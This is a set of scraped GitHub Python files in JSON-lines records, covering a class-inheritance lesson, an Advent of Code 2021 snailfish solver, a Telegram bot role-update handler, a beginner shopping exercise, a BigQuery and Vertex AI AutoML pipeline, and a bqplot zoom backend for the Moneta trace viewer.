print('Number of Lectures : ', self.lectures)\n print('Users : ', self.users)\n print('Average rating : ', self.avg_rating)\nclass VideoCourse(Course):\n def __init__(self,title,instructor,lectures,price,length_video):\n super().__init__(title,instructor,lectures,price)\n self.length_video = length_video\n def show_details(self):\n super().show_details()\n print('Video Length : ', self.length_video)\nclass PdfCourse(Course):\n def __init__(self,title,instructor,lectures,price,pages):\n super().__init__(title,instructor,lectures,price)\n self.pages = pages\n def show_details(self):\n super().show_details()\n print('Number of pages : ', self.pages)\n\n\"\"\"class course instances \"\"\"\n\nvc = VideoCourse('Learn C++', 'Jack', 30, 50, 10)\nvc.new_user_enrolled('Allen')\nvc.new_user_enrolled('Max')\nvc.new_user_enrolled('Tom')\nvc.received_a_rating(3)\nvc.received_a_rating(5)\nvc.received_a_rating(4)\nvc.show_details()\nprint()\npc = PdfCourse('Learn Java', 'Jim', 35, 50, 1000)\npc.new_user_enrolled('Allen')\npc.new_user_enrolled('Mary')\npc.new_user_enrolled('JIm')\npc.received_a_rating(5)\npc.received_a_rating(4)\npc.received_a_rating(4.5)\npc.show_details()\n\n\n\n","repo_name":"huckbyte/python-tool","sub_path":"phase1/code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22698242180","text":"\ndef add(a, b):\n su = f\"[{a},{b}]\"\n return reduce(su)\n\ndef reduce(number):\n done = False\n while not done:\n previous = \"\"\n while previous != number:\n previous = number\n number = explode(number)\n number = split(number)\n done = previous == number\n return number\n\ndef explode(number):\n nesting = 0\n exploding_pair_start = 0\n for i, n in enumerate(number):\n if n == \"[\":\n nesting += 1\n if nesting < 5: continue\n exploding_pair_start = i\n break\n if n == \"]\":\n nesting -= 1\n if exploding_pair_start == 0:\n return 
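# The TeachingAssistant class in code2.py above relies on cooperative
# multiple inheritance: super().__init__ follows the MRO TeachingAssistant ->
# Student -> Teacher -> Person, so Teacher appends 'T' before Student
# appends 'S'. A quick check of that order:
print([c.__name__ for c in TeachingAssistant.__mro__])
# ['TeachingAssistant', 'Student', 'Teacher', 'Person', 'object']
print(TeachingAssistant('2675').id)   # '2675TS'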
number\n \n exploding_pair_stop = number.find(\"]\", exploding_pair_start)\n pair = number[exploding_pair_start+1:exploding_pair_stop]\n regular_numbers = [ int(x) for x in pair.split(\",\") ]\n\n left_part = number[:exploding_pair_start]\n for i in range(len(left_part)-1, -1, -1):\n if not left_part[i].isdigit():\n continue\n if left_part[i-1].isdigit():\n print(\"left part 2\")\n x = int(left_part[i-1:i+1])\n left_part = f\"{left_part[:i-1]}{x + regular_numbers[0]}{left_part[i+1:]}\"\n break\n y = int(left_part[i])\n left_part = f\"{left_part[:i]}{y + regular_numbers[0]}{left_part[i+1:]}\"\n break\n\n right_part = number[exploding_pair_stop+1:]\n for i in range(len(right_part)):\n if not right_part[i].isdigit():\n break\n if right_part[i+1].isdigit():\n print(\"right part 2\")\n x = int(right_part[i:i+2])\n right_part = f\"{right_part[:i]}{x + regular_numbers[1]}{right_part[i+2:]}\"\n break\n y = int(right_part[i])\n right_part = f\"{right_part[:i]}{y + regular_numbers[1]}{right_part[i+1:]}\"\n break\n\n return f\"{left_part}0{right_part}\"\n\ndef split(number):\n for i in range(len(number)):\n if not number[i].isdigit(): continue\n if not number[i+1].isdigit(): continue\n\n x = int(number[i:i+2])\n number = f\"{number[:i]}[{x//2},{x//2+x%2}]{number[i+2:]}\"\n break\n return number\n\nclass TreeNode:\n def __init__(self, tokens):\n token = tokens.pop()\n if token.isdigit():\n self.left = None\n self.right = None\n self.is_leaf = True\n self.number = int(token)\n else:\n if token != \"]\": raise Exception\n self.right = TreeNode(tokens)\n tokens.pop()\n self.left = TreeNode(tokens)\n tokens.pop()\n self.is_leaf = False\n\n def parse(number):\n return TreeNode(list(number))\n \n def magnitude(self):\n if self.is_leaf:\n return self.number\n return 3 * self.left.magnitude() + 2 * self.right.magnitude()\n\ndef magnitude(number):\n tree = TreeNode.parse(number)\n return tree.magnitude()\n\nwith open(\"18.txt\", \"r\") as f:\n numbers = [ l.strip() for l in f.readlines() ]\nsu = numbers[0]\nfor n in numbers:\n su = add(su, n)\nprint(magnitude(su))","repo_name":"tato/advent2021","sub_path":"18c.py","file_name":"18c.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15904633862","text":"import sqlite3\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import StatesGroup, State\n\nfrom loader import dp, admin_id, user_db\nfrom aiogram.types import Message\nfrom view.Keyboards import kb_role_user, kb_cancel_fsm\n\n\nclass UpdUser(StatesGroup):\n user_name = State()\n user_update = State()\n user_role = State()\n\n\n@dp.message_handler(commands=['upd_user'], state=None)\nasync def upd_user(message: Message, admin: bool):\n if admin or int(admin_id) == message.from_user.id:\n await message.answer(text='Введите Фамилию)', reply_markup=kb_cancel_fsm)\n await UpdUser.user_name.set()\n else:\n await message.answer('У вас нет доступа к этой функции')\n\n\n@dp.message_handler(state=UpdUser.user_name)\nasync def user_id_up_catch(message: Message, state: FSMContext):\n user_name = message.text\n await state.update_data({'user_name': user_name})\n check = user_db.get_the_user(name=user_name)\n if check:\n await message.answer(text=f'Такой пользователь уже записан в роли {check[2]}. 
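# Quick check of the TreeNode magnitude logic in 18c.py above, using the
# worked examples from the puzzle statement: the magnitude of a pair is
# 3 * magnitude(left) + 2 * magnitude(right).
print(magnitude('[9,1]'))             # 3*9 + 2*1 = 29
print(magnitude('[[9,1],[1,9]]'))     # 3*29 + 2*21 = 129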
Выберите новый статус',\n reply_markup=kb_role_user)\n await UpdUser.user_update.set()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n await UpdUser.user_role.set()\n\n@dp.message_handler(state=UpdUser.user_update)\nasync def name_catch(message: Message, state: FSMContext):\n if message.text in ['admin', 'operator', 'deactivated']:\n await state.update_data({'user_role': message.text})\n data = await state.get_data()\n check = user_db.get_the_user(name=data.get('user_name'))\n try:\n user_db.update_user_status({'id': check[0], 'status': data.get('user_role')})\n await message.answer(f\"Пользователь {data.get('user_name')} обновлен в роли {data.get('user_role')}\")\n except sqlite3.OperationalError:\n await message.answer(\"Ошибка добавления роли пользователю! Проверьте правильность вводимых данных\",\n reply_markup=kb_cancel_fsm)\n await state.reset_data()\n await state.finish()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n\n\n@dp.message_handler(state=UpdUser.user_role)\nasync def name_catch(message: Message, state: FSMContext):\n if message.text in ['admin', 'operator', 'deactivated']:\n await state.update_data({'user_role': message.text})\n data = await state.get_data()\n try:\n user_db.add_user({'name': data.get('user_name'), 'status': data.get('user_role')})\n await message.answer(f\"Пользователь {data.get('user_name')} добавлен в роли {data.get('user_role')}\")\n except sqlite3.OperationalError:\n await message.answer(\"Ошибка добавления роли пользователю! Проверьте правильность вводимых данных\",\n reply_markup=kb_cancel_fsm)\n await state.reset_data()\n await state.finish()\n else:\n await message.answer(text='Выберите роль пользователя', reply_markup=kb_role_user)\n","repo_name":"TotskayaOV/RetentionBot","sub_path":"view/Handlers/admin/added_user.py","file_name":"added_user.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43073162983","text":"print('=' * 25)\r\nprint(' LOJA SUPER BARATAO')\r\nprint('=' * 25)\r\n\r\nsoma = maisque1000 = 0\r\ncontinuar = ''\r\nbarato = ''\r\nbaratop = 0\r\ncont = 0\r\n\r\nwhile True:\r\n nome = input('Nome do Produto: ')\r\n preço = int(input('Preço: R$'))\r\n cont += 1\r\n if cont == 1 or preço < baratop:\r\n baratop = preço\r\n barato = nome\r\n soma += preço\r\n if preço > 1000:\r\n maisque1000 += 1\r\n continuar = input('Quer continuar? 
[S/N] ').upper()\r\n if continuar == 'N':\r\n break\r\n\r\nprint(f'O total da compra foi: R${(soma):.2f}')\r\nprint(f'Temos {maisque1000} produtos que custam mais que R$1000,00')\r\nprint(f'O produto mais barato foi {barato} que custou R${(baratop):.2f}')\r\n\r\n","repo_name":"pennapatrick/Mundo-02-Python","sub_path":"Exercicios/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2050552692","text":"import requests, csv \nimport pandas as pd\nfrom google.cloud import bigquery, storage, aiplatform\n\nfrom google import cloud\n\n# from google.cloud import storage\n\n\n\ncsv_url = 'https://gist.githubusercontent.com/netj/8836201/raw/6f9306ad21398ea43cba4f7d537619d0e07d5ae3/iris.csv'\n\nbucket_url ='gs://prodapt-vertex-test/water_potability.csv'\n\n#********************************************\n#with requests \nreq = requests.get(csv_url)\ntext = req.iter_lines()\nreader = csv.reader(text, delimiter=',')\nprint(type(reader))\n\n#with pandas \ndata = pd.read_csv(csv_url)\nprint(data.dtypes)\nprint(data.columns)\n\n\n#********************************************\n\n\n#**********CREATING BUCKETS\n# # Imports the Google Cloud client library\n# from google.cloud import storage\n\n# # Instantiates a client\n# storage_client = storage.Client()\n\n# # The name for the new bucket\n# bucket_name = \"my-new-bucket\"\n\n# # Creates the new bucket\n# bucket = storage_client.create_bucket(bucket_name)\n\n# print(\"Bucket {} created.\".format(bucket.name))\n\n#*********ADDING TO BUCKETS \n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n \"\"\"Uploads a file to the bucket.\"\"\"\n # The ID of your GCS bucket\n # bucket_name = \"your-bucket-name\"\n # The path to your file to upload\n # source_file_name = \"local/path/to/file\"\n # The ID of your GCS object\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )\n\n\n#****************DOWNLOADING TO BUCKETS \n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n \"\"\"Downloads a blob from the bucket.\"\"\"\n # bucket_name = \"your-bucket-name\"\n # source_blob_name = \"storage-object-name\"\n # destination_file_name = \"local/path/to/file\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n # Construct a client side representation of a blob.\n # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve\n # any content from Google Cloud Storage. 
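# English gloss of the Portuguese text in ex070.py above: the banner reads
# "SUPER CHEAP STORE"; the prompts are "Product name:", "Price: R$", and
# "Do you want to continue? [Y/N]"; the summary lines report the purchase
# total, how many products cost more than R$1000.00, and the cheapest
# product with its price. The running-minimum bookkeeping can also be
# written without the counter by seeding the minimum with infinity, e.g.:
cheapest_name, cheapest_price = None, float('inf')
for name, price in [('arroz', 12), ('tv', 1500), ('caneta', 2)]:   # sample data
    if price < cheapest_price:
        cheapest_name, cheapest_price = name, price
print(cheapest_name, cheapest_price)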
As we don't need additional data,\n # using `Bucket.blob` is preferred here.\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\n print(\n \"Blob {} downloaded to {}.\".format(\n source_blob_name, destination_file_name\n )\n )\n\n\n#***************CONNECTING TO BIG QUERY \n# export GOOGLE_APPLICATION_CREDENTIALS=\"/mnt/c/Users/ammar.ahmed/Desktop/prodapt/vertex-final/prodapt-test-3043986cc053.json\"\n\n# Construct a BigQuery client object.\nclient = bigquery.Client()\n\nyourProject = \"prodapt-test\"\nyourDataset = \"water_kaggle\"\nyourTableName = \"water_potability\"\n\ntry: \n dataset_id = \"{}.your_dataset\".format(client.project)\n\n # Construct a full Dataset object to send to the API.\n dataset = bigquery.Dataset(yourProject +'.' + yourDataset)\n\n # TODO(developer): Specify the geographic location where the dataset should reside.\n dataset.location = \"US\"\n\n # Send the dataset to the API for creation, with an explicit timeout.\n # Raises google.api_core.exceptions.Conflict if the Dataset already\n # exists within the project.\n dataset = client.create_dataset(dataset, timeout=30) # Make an API request.\n print(\"Created dataset {}.{}\".format(client.project, dataset.dataset_id))\n\nexcept cloud.exceptions.Conflict:\n print(f'Dataset {dataset.dataset_id} already exists, not creating.')\nelse:\n print(f'Dataset {dataset.dataset_id} successfully created.') \n\n\n# TODO(developer): Set table_id to the ID of the table to create.\ntable_id = f\"{yourProject}.{yourDataset}.{yourTableName}\"\n\njob_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"ph\", \"FLOAT64\"),\n bigquery.SchemaField(\"Hardness\", \"FLOAT64\"),\n bigquery.SchemaField(\"Solids\", \"FLOAT64\"),\n bigquery.SchemaField(\"Chloramines\", \"FLOAT64\"),\n bigquery.SchemaField(\"Sulfate\", \"FLOAT64\"),\n bigquery.SchemaField(\"Conductivity\", \"FLOAT64\"),\n bigquery.SchemaField(\"Organic_carbon\", \"FLOAT64\"),\n bigquery.SchemaField(\"Trihalomethanes\", \"FLOAT64\"),\n bigquery.SchemaField(\"Turbidity\", \"FLOAT64\"),\n bigquery.SchemaField(\"Potability\", \"INT64\")\n ],\n skip_leading_rows=1,\n # The source format defaults to CSV, so the line below is optional.\n source_format=bigquery.SourceFormat.CSV,\n max_bad_records = 1000\n\n)\n\nload_job = client.load_table_from_uri(\n bucket_url, table_id, job_config=job_config\n) # Make an API request.\n\nload_job.result() # Waits for the job to complete.\n\ndestination_table = client.get_table(table_id) # Make an API request.\nprint(\"Loaded {} rows.\".format(destination_table.num_rows))\n\n\n\nbq_url = f'bq://{yourProject}.{yourDataset}.{yourTableName}'\nvertex_loc = 'us-central1'\n\naiplatform.init(project=yourProject, location=vertex_loc)\n\ndataset = aiplatform.TabularDataset.create(\n display_name=yourDataset, bq_source=bq_url,\n)\n\n\ndataset.wait()\n\nprint(f'\\tDataset: \"{dataset.display_name}\"')\nprint(f'\\tname: \"{dataset.resource_name}\"')\n\ndatasetLoc = dataset.resource_name\n\ndataset = aiplatform.TabularDataset(datasetLoc)\n\njob = aiplatform.AutoMLTabularTrainingJob(\n display_name=yourDataset,\n optimization_prediction_type=\"classification\",\n optimization_objective=\"maximize-au-roc\",\n)\n\nmodel = job.run(\n dataset=dataset,\n target_column=\"Potability\",\n training_fraction_split=0.6,\n validation_fraction_split=0.2,\n test_fraction_split=0.2,\n budget_milli_node_hours=1000,\n model_display_name=\"my-automl-model\",\n disable_early_stopping=False,\n)\n\n\n\nendpoint = 
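# Hedged follow-up to the BigQuery load in model_creation.py above: once
# load_job.result() returns, the table can be queried back with the same
# client. `client` and `table_id` are the objects defined in the source;
# the aggregate query itself is illustrative.
query = f"SELECT Potability, COUNT(*) AS n FROM `{table_id}` GROUP BY Potability"
for row in client.query(query).result():
    print(row.Potability, row.n)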
model.deploy(machine_type=\"n1-standard-4\",\n min_replica_count=1,\n max_replica_count=5,\n accelerator_type='NVIDIA_TESLA_K80',\n accelerator_count=1)\n\n\nmodel = aiplatform.Model.upload(\n display_name='my-model',\n artifact_uri=\"gs://python/to/my/model/dir\",\n serving_container_image_uri=\"gcr.io/cloud-aiplatform/prediction/tf2-cpu.2-2:latest\",\n)\n\nmodel = aiplatform.Model(f'/projects/{yourProject}/locations/us-central1/models/{my-automl-model}')\n","repo_name":"ammaarahmed/prodapt-test","sub_path":"model_creation.py","file_name":"model_creation.py","file_ext":"py","file_size_in_byte":6358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72928659617","text":"# # alternate wrapper version in case the function should be left alone\n# def fix_image_flipping(func):\n# from functools import wraps\n# @wraps(func)\n# def wrapper(self,rgb_image):\n# return func(self, np.flipud(rgb_image))\n# return wrapper\n# BqplotBackend.update_image = fix_image_flipping(BqplotBackend.update_image)\n\n\nfrom vaex.jupyter.plot import BackendBase\nfrom vaex.jupyter.utils import debounced\nimport vaex\nimport numpy as np\nimport bqplot\nimport bqplot.pyplot as plt\nimport ipywidgets as widgets\nimport ipyvuetify as v\nimport copy\nfrom IPython.display import Image as IPyImage\nfrom IPython.display import clear_output\n\nfrom moneta.settings import TextStyle, WARNING_LABEL\nfrom PIL import Image\n\nblackish = '#666'\n\n\naccessRanges = {}\nZOOM_SELECT = 'Zoom to Selection'\nPAN_ZOOM = 'Pan Zoom test1'\nRESET_ZOOM = 'Reset Zoom'\nCLICK_ZOOM_IN = 'Click Zoom IN'\nCLICK_ZOOM_OUT = 'Click Zoom OUT'\nCLICK_ZOOM_SCALE = 0.1 # 10x zoom\nSCREENSHOT = 'Screenshot Test'\nRULER = \"Measurement\"\n\nUNDO = 'Undo'\nREDO = 'Redo'\n\nfrom enum import Enum\nclass Action(Enum):\n other = 0\n undo = 1\n redo = 2\n\nPANZOOM_HISTORY_LIMIT = 50\n\nclass BqplotBackend(BackendBase):\n def __init__(self, figure=None, figure_key=None):\n self._dirty = False\n self.figure_key = figure_key\n self.figure = figure\n self.signal_limits = vaex.events.Signal()\n\n self._cleanups = []\n # self.coor_x = 0\n # self.coor_y = 0\n self.czoom_xmin = 0\n self.czoom_xmax = 0\n self.czoom_ymin = 0\n self.czoom_ymax = 0\n self.res = 0\n self._observers = []\n\n\n def update_image(self, rgb_image):\n with self.output:\n rgb_image = (rgb_image * 255.).astype(np.uint8)\n pil_image = vaex.image.rgba_2_pil(rgb_image)\n self.pil_image_test = pil_image\n \n data = vaex.image.pil_2_data(pil_image)\n self.core_image.value = data\n # force update\n self.image.image = self.core_image_fix\n self.image.image = self.core_image\n self.image.x = (self.scale_x.min, self.scale_x.max)\n #self.image.y = (self.scale_y.min, self.scale_y.max)\n self.image.y = (self.limits[1][0], self.limits[1][1])\n self.base_address.value = f\"Base address: 0x{int(self.limits[1][0]):X}\"\n self.zoom_args.value = self.zoom_args_string()\n self.plot.update_stats()\n\n def create_widget(self, output, plot, dataset, limits):\n self.plot = plot\n self.output = output\n self.dataset = dataset\n self.limits = np.array(limits).tolist()\n def fix(v):\n # bqplot is picky about float and numpy scalars\n if hasattr(v, 'item'):\n return v.item()\n else:\n return v\n self.scale_x = bqplot.LinearScale(min=fix(limits[0][0]), max=fix(limits[0][1]), allow_padding=False)\n self.scale_y = bqplot.LinearScale(min=fix(limits[1][0]), max=fix(limits[1][1]), allow_padding=False)\n self.scales = {'x': self.scale_x, 'y': self.scale_y}\n\n self.figure = 
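# Note on the last line of model_creation.py above: `{my-automl-model}`
# inside the f-string is evaluated as the expression `my - automl - model`
# and raises a NameError at runtime, and the path expects the numeric model
# ID rather than a display name. A working, hedged form (MODEL_ID is a
# placeholder for the ID Vertex assigns):
MODEL_ID = '1234567890'   # hypothetical
model = aiplatform.Model(f'projects/{yourProject}/locations/us-central1/models/{MODEL_ID}')

# Once deployed, the endpoint returned by model.deploy() can serve online
# predictions; the instance keys mirror the training columns and the values
# here are illustrative only:
prediction = endpoint.predict(instances=[{
    'ph': '7.0', 'Hardness': '200.0', 'Solids': '20000.0', 'Chloramines': '7.0',
    'Sulfate': '330.0', 'Conductivity': '420.0', 'Organic_carbon': '14.0',
    'Trihalomethanes': '66.0', 'Turbidity': '4.0',
}])
print(prediction.predictions)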
plt.figure(self.figure_key, fig=self.figure, scales=self.scales)\n self.figure.layout.width = 'calc(100% - 400px)'\n self.figure.layout.min_height = '800px'\n plt.figure(fig=self.figure)\n #self.figure.padding_y = 0\n x = np.arange(0, 10)\n y = x ** 2\n self.core_image = widgets.Image(format='png')\n self.core_image_fix = widgets.Image(format='png')\n\n self.image = bqplot.Image(scales=self.scales, image=self.core_image)\n # triggered by regular mouse click not a brush selector\n self.image.on_element_click(self.click_to_zoom)\n \n self.figure.marks = self.figure.marks + [self.image]\n self.scatter = s = plt.scatter(x, y, visible=False, rotation=x, scales=self.scales, size=x, marker=\"arrow\")\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x], 'y': [self.scale_y]})\n self.figure.interaction = self.panzoom\n for axes in self.figure.axes:\n axes.grid_lines = 'none'\n axes.color = axes.grid_color = axes.label_color = blackish\n self.figure.axes[0].label = plot.x_label\n self.figure.axes[1].label = plot.y_label\n self.figure.axes[1].scale = bqplot.LinearScale(min = 0, max=self.scale_y.max-self.scale_y.min, allow_padding=False)\n self.stuck_ctr = 0\n\n self.base_address = widgets.Label(value=f\"Base address: 0x{int(self.limits[1][0]):X}\")\n self.zoom_args = widgets.Text(\n description=\"Zoom Args\", \n value=self.zoom_args_string(), \n disabled=True, \n style={'description_width':'initial'},\n layout=widgets.Layout(width='50%')\n )\n\n self.curr_action = Action.other\n self.undo_actions = list()\n self.redo_actions = list()\n self.counter = 2\n self.scale_x.observe(self._update_limits)\n self.scale_y.observe(self._update_limits)\n self.widget = widgets.VBox([self.figure, self.base_address, self.zoom_args])\n self.create_tools()\n\n @debounced(0.2, method=True)\n def _update_limits(self, *args):\n with self.output:\n limits = copy.deepcopy(self.limits)\n limits[0:2] = [[scale.min, scale.max] for scale in [self.scale_x, self.scale_y]]\n self.figure.axes[1].scale=bqplot.LinearScale(min=0, max=self.scale_y.max-self.scale_y.min, allow_padding=False)\n self.figure.axes[0].scale=bqplot.LinearScale(min=self.scale_x.min, max=self.scale_x.max, allow_padding=False)\n if self.counter == 2:\n self.output.clear_output() # Disable when debugging\n self.stuck_ctr = 0\n if self.curr_action in [Action.redo, Action.other]:\n self.undo_btn.disabled = False\n self.undo_actions.append(self.limits)\n if len(self.undo_actions) > PANZOOM_HISTORY_LIMIT:\n self.undo_actions.pop(0)\n if self.curr_action == Action.redo:\n self.redo_actions.pop()\n if len(self.redo_actions) == 0:\n self.redo_btn.disabled = True\n else:\n self.redo_btn.disabled = True\n self.redo_actions.clear()\n elif self.curr_action == Action.undo:\n self.redo_btn.disabled = False\n self.redo_actions.append(self.limits)\n if len(self.redo_actions) > PANZOOM_HISTORY_LIMIT:\n self.redo_actions.pop(0)\n self.undo_actions.pop()\n if len(self.undo_actions) == 0:\n self.undo_btn.disabled = True\n self.curr_action = Action.other\n self.counter = 1\n self._update_limits(self, *args)\n else:\n self.counter = 2\n self.limits = limits\n\n\n def create_tools(self):\n self.tools = []\n self.tool_actions = []\n tool_actions_map = dict()\n\n if 1: # tool_select:\n #### initiaite the 4 types of zoom brushes, which should only highlight axis that are not locked ###\n self.zoom_brush_full = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"blue\")\n self.zoom_brush_full.observe(self.update_zoom_brush_full, [\"brushing\"])\n \n 
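# Minimal sketch of the bqplot plumbing create_widget and update_image use
# above: an ipywidgets.Image holds the PNG bytes, a bqplot.Image mark places
# it in data coordinates, and reassigning the mark's x/y traits stretches the
# bitmap across the current view after a zoom. `png_bytes` is a placeholder
# for the rendered heatmap.
import bqplot
import ipywidgets as widgets

png_bytes = open('heatmap.png', 'rb').read()   # placeholder asset
sx = bqplot.LinearScale(min=0.0, max=1.0, allow_padding=False)
sy = bqplot.LinearScale(min=0.0, max=1.0, allow_padding=False)
core = widgets.Image(value=png_bytes, format='png')
mark = bqplot.Image(image=core, scales={'x': sx, 'y': sy})
mark.x = (sx.min, sx.max)
mark.y = (sy.min, sy.max)
fig = bqplot.Figure(marks=[mark])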
self.zoom_brush_vertical = bqplot.interacts.BrushIntervalSelector(scale=self.scale_y, orientation='vertical', color=\"blue\")\n self.zoom_brush_vertical.observe(self.update_zoom_brush_vertical, [\"brushing\"])\n\n self.zoom_brush_horizontal = bqplot.interacts.BrushIntervalSelector(scale=self.scale_x, orientation='horizontal', color=\"blue\")\n self.zoom_brush_horizontal.observe(self.update_zoom_brush_horizontal, [\"brushing\"])\n\n self.zoom_brush_none = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"gray\")\n self.zoom_brush_none.observe(self.update_zoom_brush_none, [\"brushing\"])\n\n # initiaite measurement tool\n self.ruler = bqplot.interacts.BrushSelector(x_scale=self.scale_x, y_scale=self.scale_y, color=\"blue\")\n self.ruler.observe(self.measure_selected_area, [\"brushing\"])\n #### Set the default initial tools ####\n self.zoom_brush = self.zoom_brush_full \n self.click_brush = None # use regular mouse\n self.click_brush_in = None \n self.click_brush_out = None\n\n tool_actions_map[ZOOM_SELECT] = self.zoom_brush\n tool_actions_map[PAN_ZOOM] = self.panzoom\n tool_actions_map[CLICK_ZOOM_IN] = self.click_brush_in\n tool_actions_map[CLICK_ZOOM_OUT] = self.click_brush_out\n tool_actions_map[RULER] = self.ruler\n self.tool_actions = [PAN_ZOOM, ZOOM_SELECT,\n CLICK_ZOOM_IN, CLICK_ZOOM_OUT, RULER]\n\n self.start_limits = copy.deepcopy(self.limits)\n\n def change_interact(*args):\n with self.output:\n name = self.tool_actions[self.interaction_tooltips.v_model]\n self.figure.interaction = tool_actions_map[name]\n if name == RULER:\n self.plot.model.legend.openMeasurementPanel()\n\n self.interaction_tooltips = \\\n v.BtnToggle(v_model=0, mandatory=True, multiple=False, children=[\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['pan_tool'])\n ])\n }], children=[PAN_ZOOM]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['crop'])\n ])\n }], children=[ZOOM_SELECT]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(\n children=['mdi-magnify-plus-cursor'])\n ])\n }], children=[CLICK_ZOOM_IN]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(\n children=['mdi-magnify-minus-cursor'])\n ])\n }], children=[CLICK_ZOOM_OUT]),\n v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': v.Btn(v_on='tooltip.on', children=[\n v.Icon(children=['mdi-ruler'])\n ])\n }], children=[RULER]) # ruler\n ])\n self.interaction_tooltips.observe(change_interact, \"v_model\")\n\n def reset(*args):\n (x1, x2), (y1, y2) = self.start_limits\n self.zoom_sel(x1, x2, y1, y2, smart_zoom=True)\n with self.zoom_brush.hold_trait_notifications():\n self.zoom_brush.selected_x = None\n self.zoom_brush.selected_y = None\n self.zoom_brush.selected = None\n \n self.screenshot_btn = v.Btn(v_on='tooltip.on', icon=True, children=[\n v.Icon(children=['mdi-camera'])\n ])\n self.screenshot_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.screenshot_btn\n }], children=[SCREENSHOT])\n @debounced(0.5)\n def screenshot():\n def peer(a):\n print(type(a).__name__)\n print(type(a).__module__)\n print(dir(a))\n \n 
#display(self.pil_image_test)\n # print(self.core_image.value)\n #peer(self.figure)\n #self.figure.save_png(\"test.png\")\n #display(IPyImage(\"test.png\"))\n #display(self.core.image)\n clear_output(wait=True)\n self.plot.model.plot.show()\n display(IPyImage(self.core_image.value))\n \n self.screenshot_btn.on_event('click', lambda *ignore: screenshot())\n self.reset_btn = v.Btn(v_on='tooltip.on', icon=True, children=[\n v.Icon(children=['refresh'])\n ])\n self.reset_btn.on_event('click', lambda *ignore: reset())\n self.reset_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.reset_btn\n }], children=[RESET_ZOOM])\n\n self.undo_btn = v.Btn(v_on='tooltip.on', icon=True, disabled=True, children=[\n v.Icon(children=['undo'])\n ])\n self.undo_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.undo_btn\n }], children=[UNDO])\n \n self.redo_btn = v.Btn(v_on='tooltip.on', icon=True, disabled=True, children=[\n v.Icon(children=['redo'])\n ])\n self.redo_tooltip = v.Tooltip(bottom=True, v_slots=[{\n 'name': 'activator',\n 'variable': 'tooltip',\n 'children': self.redo_btn\n }], children=[REDO])\n @debounced(0.5)\n def undo_redo(*args):\n self.curr_action = args[0]\n (x1, x2), (y1, y2) = args[1][-1]\n with self.scale_x.hold_trait_notifications():\n with self.scale_y.hold_trait_notifications():\n self.scale_x.min, self.scale_x.max = x1, x2\n self.scale_y.min, self.scale_y.max = y1, y2\n self.undo_btn.on_event('click', lambda *ignore: undo_redo(Action.undo, self.undo_actions))\n self.redo_btn.on_event('click', lambda *ignore: undo_redo(Action.redo, self.redo_actions))\n\n\n\n control_lyt = widgets.Layout(width='100px')\n self.control_x = widgets.Checkbox(value=False,description='Lock X Axis',indent=False, layout=control_lyt)\n self.control_y = widgets.Checkbox(value=False,description='Lock Y Axis',indent=False, layout=control_lyt)\n def axis_lock_update(checkbox):\n ####### Only allows one checkbox to be locked at a time ######\n if checkbox['owner'].description == self.control_x.description:\n if self.control_y.value:\n self.control_y.value = False\n\n if checkbox['owner'].description == self.control_y.description:\n if self.control_x.value:\n self.control_x.value = False\n ##############################################################\n # When a axis checkbox is locked.\n # Updates the panzoom tool to lock eithier the x or y axis.\n # Also updates the zoombrush tool to use relevant zoom brush\n if self.control_x.value:\n if self.control_y.value:\n self.panzoom = bqplot.PanZoom()\n self.zoom_brush = self.zoom_brush_none\n else:\n self.panzoom = bqplot.PanZoom(scales={'y': [self.scale_y]})\n self.zoom_brush = self.zoom_brush_vertical\n else:\n if self.control_y.value:\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x]})\n self.zoom_brush = self.zoom_brush_horizontal\n else:\n self.panzoom = bqplot.PanZoom(scales={'x': [self.scale_x], 'y': 